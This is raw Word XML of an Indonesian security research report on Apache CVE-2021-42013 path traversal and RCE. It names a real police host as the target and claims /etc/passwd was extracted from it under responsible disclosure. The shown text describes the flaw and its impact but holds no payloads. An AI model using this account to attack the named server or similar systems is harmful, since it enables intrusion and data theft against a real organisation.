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before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A37501D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="502E35A4" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY RESEARCH JOURNAL</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="52D2670D" wp14:textId="1AF37DC9">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>42013  |</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  CVSS 9.8 CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62A809FA" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73C58CD1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 xml:space="preserve">Path Traversal, Privilege Escalation &amp;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="15EFFC46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C0392B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="61CAAC5F" wp14:textId="04F425D4">
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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>Analisis</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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>Mendalam</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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>Kerentanan</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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 xml:space="preserve"> Double URL</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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>-</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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 xml:space="preserve">Encoding pada </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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>Infrastruktur</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC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>Kepolisian</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Negara Republik Indonesia</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5DAB6C7B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3CFFFFC7" w14:paraId="0FBDA5AE" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A3449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Peneliti / Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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668DC" wp14:textId="3EF565D2">
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="1B460911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Pwn0sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="39620BAB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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2310C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Tanggal Temuan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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09C22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07 Januari 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="16AB4D29" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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24F8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Target Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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96E94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dumaspresisi.itwasum.polri.go.id:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3022D0EB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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03426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Organisasi Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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92D49" wp14:textId="77777777"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Kepolisian Negara Republik Indonesia (POLRI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="06E38F2D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E440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w="6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1FD66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Apache HTTP Server 2.4.50 (Unix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="2E177E48" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A2DA7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Referensi CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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421BB" wp14:textId="3C46DD59"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CVE</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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2021</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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41773 / CVE</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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2021</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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42013</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="406157D3" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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8013B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Klasifikasi Serangan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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E9CD0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Path Traversal → Privilege Escalation → RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="4D73C929" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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6998B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CVSS Base Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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7AF90" wp14:textId="2A381D9E"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9.8 / 10 </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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CRITICAL (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AV:N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/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AC:L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/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PR:N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/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UI:N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/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S:U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/C:H/I:H/A:H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="1C8BB352" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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2994B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Tools Digunakan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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F1E4C" wp14:textId="0F004D42"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Ghidra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, Burp Suite, curl, Nmap, Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3FFA6DA5" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9509E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Status Pengungkapan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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CC499" wp14:textId="6F168B97"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Responsible Disclosure </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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Laporan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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Terkirim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02EB378F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6A05A809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CFFFFC7" w14:paraId="17BBCEB4" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D68910" w:sz="8"/>
              <w:left w:val="single" w:color="D68910" w:sz="8"/>
              <w:bottom w:val="single" w:color="D68910" w:sz="8"/>
              <w:right w:val="single" w:color="D68910" w:sz="8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43589" wp14:textId="7751DA22"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DISCLAIMER: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Jurnal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ini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ditulis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semata</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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mata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untuk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tujuan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penelitian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keamanan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(security research) dan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edukasi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.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Seluruh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pengujian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dilakukan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secara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etis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dengan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prinsip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responsible disclosure.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Penggunaan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teknik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dalam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dokumen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ini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terhadap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sistem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tanpa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izin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adalah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tindakan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ilegal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dan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dapat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dituntut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secara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hukum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.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14:paraId="3385D707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Daftar Isi / Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="71C8C58E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>1. Abstract &amp; Ringkasan Eksekutif</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0F6AD9EF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2. CVSS Score &amp; Severity Metrics</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3D55DAFF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3. Environment &amp; Target Scope</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0C9E7D4A" wp14:textId="163EB3ED">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pP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 xml:space="preserve">4. Methodology </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B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>Tahapan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>Penelitian</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2D1E5CD8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5. Reconnaissance &amp; Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="36693C7F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6. Vulnerability Scanning &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="18758085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>7. Latar Belakang Kerentanan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5B5DC201" wp14:textId="5AE081E1">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pP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 xml:space="preserve">8. Traversal Analysis </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B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>Mekanisme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 xml:space="preserve"> Bypass</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="03C072AE" wp14:textId="45481A8E">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pP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 xml:space="preserve">9. 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>Ghidra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 xml:space="preserve"> Analysis </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B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>Decompilasi</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Biner</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="36CE3DFF" wp14:textId="54A76A76">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Proof of Concept </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Path Traversal (File Read)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="08A378F6" wp14:textId="7EE0E3F4">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Proof of Concept </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="72E31C36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12. Advanced Exploitation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0737FCF6" wp14:textId="69014566">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>13. Post</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exploitation &amp; Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1A7E7741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14. Network Traffic Analysis (Wireshark)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0F3E8889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15. Defensive Evasion Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5018DE9C" wp14:textId="15EBA58E">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pPr>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16. Detection Engineering </w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> YARA Rules</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="237D1005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17. Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="770FBA47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18. Risk Assessment Matrix</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="50119ECB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19. Recommendations &amp; Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73D61B96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20. Secure Configuration Hardening Guide</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="335FAD5E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21. Patch Verification Procedure</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="740FD3C3" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">22. References &amp; Further Reading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:rsidP="3CFFFFC7" w14:paraId="411CE4C6" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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1. Abstract &amp; Ringkasan Eksekutif</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="05BE7447" wp14:textId="6BFF7554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Laporan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penelitian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mendokumentasikan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secara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komprehensif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proses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penemuan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analisis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eksploitasi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kerentanan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CVE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2021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42013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ditemukan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aktif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pada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infrastruktur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server web Apache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milik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Kepolisian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Negara Republik Indonesia (POLRI),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tepatnya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pada host dumaspresisi.itwasum.polri.go.id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beroperasi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pada port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="78840F9B" wp14:textId="2E273BE8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CVE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2021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42013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adalah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kerentanan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kritis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merupakan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bypass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langsung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terhadap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perbaikan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tidak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sempurna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CVE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2021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41773 pada Apache HTTP Server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versi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2.4.50.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Penyerang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tidak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terautentikasi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dapat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memanfaatkan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teknik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double URL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encoding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menipu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mekanisme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normalisasi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jalur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(path normalization) Apache,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sehingga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mampu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melakukan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traversal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direktori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melampaui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batas document root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ditetapkan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20172F17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Penelitian ini berhasil membuktikan dua vektor eksploitasi utama: pertama, pembacaan file sensitif arbitrer dari filesystem server (information disclosure) termasuk berhasil mengekstrak isi file /etc/passwd; dan kedua, dalam kondisi modul CGI aktif, eksekusi kode arbitrer dari jarak jauh (Remote Code Execution) dengan identitas proses daemon Apache.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2FE06878" wp14:textId="29ACC90C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Analisis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menggunakan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Ghidra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mengungkap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akar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permasalahan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pada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fungsi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ap_normalize_path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() di server/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util.c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di mana proses URL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decoding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hanya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dilakukan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satu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kali (single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pass),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gagal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mendeteksi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representasi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double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encoded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dari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karakter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traversal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'..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/'.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Laporan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juga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mencakup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analisis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traffic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jaringan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teknik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post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exploitation,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deteksi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serangan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menggunakan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YARA rules,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serta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panduan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hardening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komprehensif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72A3D3EC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CFFFFC7" w14:paraId="34731953" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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5BF3B" wp14:textId="1755D0AF"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TEMUAN KRITIS: Server dumaspresisi.itwasum.polri.go.id:8080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terbukti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menjalankan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Apache HTTP Server 2.4.50 yang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rentan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terhadap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CVE</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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2021</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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42013. File /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etc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/passwd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berhasil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diekstrak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pada 07 Januari 2024,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mengekspos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31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akun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sistem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termasuk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5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akun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dengan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shell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aktif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(/bin/bash).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Serangan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dapat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dilakukan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tanpa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otentikasi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,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tanpa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interaksi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pengguna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,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dari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jaringan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manapun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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0D0B940D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4AEE5476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2. CVSS Score &amp; Severity Metrics</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="370E42DA" wp14:textId="568E3C41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Kerentanan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CVE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2021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42013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mendapatkan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skor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CVSS v3.1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sebesar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9.8 (Critical),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menjadikannya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salah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satu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kerentanan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dengan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tingkat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keparahan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tertinggi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pernah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ditemukan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pada Apache HTTP Server.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Berikut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adalah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uraian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lengkap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semua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komponen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skor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CVSS.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0E27B00A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600"/>
        <w:gridCol w:w="2460"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="54653859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BFF3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Metrik CVSS v3.1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92F9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7A3F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Singkatan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22B9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Keterangan Teknis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="260F9C0A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A5ED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CVSS Base Score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202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9.8 / 10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FC98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A28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Tingkat tertinggi kedua dalam skala CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="38ABC2F2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E310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Attack Vector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7212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Network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5E2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AV:N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BC27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Dapat dieksploitasi dari jarak jauh via internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
